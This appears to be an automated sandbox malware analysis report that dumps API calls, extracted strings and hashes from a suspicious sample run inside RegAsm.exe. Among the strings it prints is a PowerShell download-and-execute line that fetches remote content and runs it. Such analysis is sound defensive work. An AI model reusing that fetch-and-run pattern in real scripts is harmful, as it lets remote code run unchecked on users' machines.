                                                                                                                                                                                                                                                                                                  • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 2215929589-186952963
                                                                                                                                                                                                                                                                                                  • Opcode ID: 21535aa95325a0fafb9671f70929af331cdfd0dddaf6e9c4004634e5144dfcc8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 871f29370a4207a558a9410f1a869844a528fdaeb7b42278f87844e468f4e222
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21535aa95325a0fafb9671f70929af331cdfd0dddaf6e9c4004634e5144dfcc8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27D15E71815248EACB15EBE5C952BDDBBB86F25304F5040BEE50273692DF782B0CCBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7FEB83
                                                                                                                                                                                                                                                                                                  • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C83B392,?,?,00000001), ref: 6C8391F4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                                                                                                                                                  • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                                                                                                                                                  • API String ID: 3790164461-3347204862
                                                                                                                                                                                                                                                                                                  • Opcode ID: 743e807946990a5bc4b17058af5f5bae3b25e7a8b5e5cd9c069439024d36765e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d02b6c84c1c5711862895413290bd13cd59113ae2bd966367e0612c34dd19b2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 743e807946990a5bc4b17058af5f5bae3b25e7a8b5e5cd9c069439024d36765e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDB11A70A011199BDB24CF99CA95BEEBBB6BF44308F505C29C415ABF80D731D949CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C81C5A3
• WideCharToMultiByte.KERNEL32 ref: 6C81C9EA
• malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C81C9FB
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C81CA12
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C81CA2E
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C81CAA5
Strings
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWidestrlen$freemalloc
• String ID: (null)$0
• API String ID: 4074790623-38302674
• Opcode ID: 5f801034c4272e5e690cb185e34db6890aa71a54bdfb862727efa617cf63c90c
• Instruction ID: 7685d0bc4dd6a41737b063a451a32271ac12140619dff2ab90053e403cfedba8
• Opcode Fuzzy Hash: 5f801034c4272e5e690cb185e34db6890aa71a54bdfb862727efa617cf63c90c
• Instruction Fuzzy Hash: AAA1913060D3829FDB21DF28C64475ABBE1AF89758F148D2DE899D7A42D731EC05CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F3492
• GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F34A9
• LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F34EF
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C7F350E
• __Init_thread_footer.LIBCMT ref: 6C7F3522
• __aulldiv.LIBCMT ref: 6C7F3552
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F357C
• GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F3592
  • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
  • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
Strings
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
• String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
• API String ID: 3634367004-706389432
• Opcode ID: e1ff93cd942d837ee5a2ccc8015f424a228819c580b885dcf11abe2333de5aea
• Instruction ID: c9520bf31992126ec0864cdd9f5aa2fa3a5d6f46aed89e0d90df8b6ffdb1e817
• Opcode Fuzzy Hash: e1ff93cd942d837ee5a2ccc8015f424a228819c580b885dcf11abe2333de5aea
• Instruction Fuzzy Hash: 18318171B001159BDF21DBB9CA8CAAE77B5FB96308F100439E515A3750F774A905CBB1
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
• String ID:
• API String ID: 1192971331-0
• Opcode ID: 598f1cc2a60b729ecef1714d454c1abb70fe872718df214a9954d84dabc10a96
• Instruction ID: 2a4c3f86920f3ca8d8cba2d7d77850e7f243ef5972e2c33f7ce6d28b3f51bf7c
• Opcode Fuzzy Hash: 598f1cc2a60b729ecef1714d454c1abb70fe872718df214a9954d84dabc10a96
• Instruction Fuzzy Hash: 21314CB19047048FDB51AF79D68C2AEBBF1BF85309F01493DE99587311EB709498CBA2
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BDFF
                                                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040BE15
                                                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040BE46
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(75AA5460,?,?,?,?,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BE66
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BE77
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BE7E
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(75AA5460,?,?,?,?,?,0040BF45,0040C750,?,0040C750,?,75AA5460,00000000), ref: 0040BE8E
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040BEBA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Heapstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                                                                                  • API String ID: 4020929367-2554083253
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C809675
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C809697
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8096E8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C809707
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80971F
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809773
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8097B7
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C8097D0
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C8097EB
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809824
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 409848716-3880535382
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7F1EC1
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7F1EE1
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E744), ref: 6C7F1F38
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E744), ref: 6C7F1F5C
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C7F1F83
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7F1FC0
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7F1FE2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7F1FF6
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7F2019
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                                  • API String ID: 2055633661-2608361144
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C807EA7
                                                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000001), ref: 6C807EB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C80CB49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C80CBB6
                                                                                                                                                                                                                                                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C807EC4
                                                                                                                                                                                                                                                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C807F19
                                                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(?), ref: 6C807F36
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C807F4D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                                                  • API String ID: 204725295-2564639436
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00411A55
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407546,0040DA84), ref: 00411A86
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00407546,0040DA84), ref: 00411A8D
                                                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00411A9C
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001001,00000000), ref: 00411AFD
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B0C
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411B13
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                                                                  • API String ID: 396451647-2783943728
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041420E
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041421A
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 0041422F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004142D1
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004142DE
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004142F0
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00414301
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                                                                  • API String ID: 1943017432-4251816714
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 00410BCA
                                                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00410BD5
                                                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410BE0
                                                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00410BEB
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000), ref: 00410BF8
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000,?), ref: 00410BFF
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410C0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %dx%d
                                                                                                                                                                                                                                                                                                  • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                                                                  • Opcode ID: dc66decae07814dc11c4117faf6020aec9e0522b32d48f8d1c27e65cdf2aeac4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 28a443ccca6aafef8e103660202004194f8b9ab8a3b23b210e6d3760195870f7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc66decae07814dc11c4117faf6020aec9e0522b32d48f8d1c27e65cdf2aeac4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50018132740224BBE3202BE9AC0EF5A7A9DEB0AB52F001055FB05E72D0D6B51C0087E9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL ref: 6C803EEE
• RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C803FDC
• RtlAllocateHeap.NTDLL ref: 6C804006
• RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C8040A1
• RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C803CCC), ref: 6C8040AF
• RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C803CCC), ref: 6C8040C2
• RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C804134
• RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C803CCC), ref: 6C804143
• RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C803CCC), ref: 6C804157
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: Free$Heap$StringUnicode$Allocate
• String ID:
• API String ID: 3680524765-0
• Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
• Instruction ID: 7e7a29fc2a12b16af7d6c006225b6f036d2e8b1a632cc88154a74848677a78d8
• Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
• Instruction Fuzzy Hash: 0BA1A1B1B40205CFDB60CF69CA80659B7B5FF98308F2549A9D909AF712D771EC46CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C848273), ref: 6C849D65
• free.MOZGLUE(6C848273,?), ref: 6C849D7C
• free.MOZGLUE(?,?), ref: 6C849D92
• ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C849E0F
• free.MOZGLUE(6C84946B,?,?), ref: 6C849E24
• free.MOZGLUE(?,?,?), ref: 6C849E3A
• ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C849EC8
• free.MOZGLUE(6C84946B,?,?,?), ref: 6C849EDF
• free.MOZGLUE(?,?,?,?), ref: 6C849EF5
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: free$StampTimeV01@@Value@mozilla@@
• String ID:
• API String ID: 956590011-0
• Opcode ID: a1260c633bea4c0d1dbb884e7fb64d2e4c960c991dfc50227bd25e31b24b17ed
• Instruction ID: 10824e066cacae98cca4415f3281c30d66be9a483d6d33f71c551ec4f8d30fbd
• Opcode Fuzzy Hash: a1260c633bea4c0d1dbb884e7fb64d2e4c960c991dfc50227bd25e31b24b17ed
• Instruction Fuzzy Hash: AB7190B0909B458BD722CF18C64095BF7F4FF99315B449A29E85A5BB01EB30E8C5CB81
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
